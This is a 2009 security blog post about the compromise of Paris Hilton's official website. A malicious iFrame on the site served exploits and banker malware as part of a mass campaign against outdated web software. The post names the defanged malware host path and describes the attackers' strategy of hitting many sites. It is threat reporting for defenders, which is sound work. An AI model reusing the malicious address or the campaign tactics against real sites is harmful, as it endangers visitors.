January 14th, 2009
Posted by Dancho Danchev @ 6:55 am
Categories: Hackers, Browsers, Botnets, Exploit code, Passwords, Anti Virus, Malware
Tags: Security, Web Malware, Paris Hilton, Banker Malware, Dancho Danchev
The official web site of Paris Hilton (parishilton.com) has been embedded with a malicious iFrame, automatically exposing visitors to client-side vulnerabilities and banker malware, according to researchers from ScanSafe. Upon closer analysis, it appears that the site has been infected on the 8th of January, Thursday, becoming the very latest legitimate site whose use of outdated web application software led to its exploitation.
Moreover, just like we’ve seen in previous related attacks, Hilton’s site compromise is a part of bigger malware campaign affecting several thousand sites, and is not being exclusively targeted.
A javascript embedded at the bottom of the site, is actually an iFrame that used to point to the now down you69tube .com/flvideo/.a/.t/index .php. Once the downloader is executed it attempts to download another binary from the same site, including configuration files from several other sites among which is ManggaTv.com. The abuse and use of legitimate infrastructure as a foundation for the entire malicious campaign, is a common practice applied by cybercriminals these days. For instance, in this campaign not only is the official web site of a popular celebrity used to acquire the traffic, but also, another legitimate site is used as a dropzone for the configuration file of the banker malware.
Let’s discuss the attackers’ logic applied here. December’s massive SQL injection attack affecting thousands of Chinese web sites used as infection vectors serving the IE XML parsing zero day, is an example of the “long tail of SQL injected sites” versus targeted attacks against high profile sites. Basically, their mentality relies on the fact that not only would thousands of sites acquire more traffic than a high profile one, but also, that their campaign may live longer if they diversify instead of centralizing it by using a single high profile site despite the anticipated traffic that would come from it.
For the time being the malicious iFrame has been removed, and the malware campaign is in a cover-up phrase — they wish.
Dancho Danchev is an independent security consultant and cyber threats analyst, with extensive experience in open source intelligence gathering, malware and E-crime incident response. Dancho is also involved in business development, marketing research and competitive intelligence as an independent contractor. He's been an active security blogger since 2007, and maintains a popular
security blog sharing real-time threats intelligence data with the rest of the community on a daily basis.
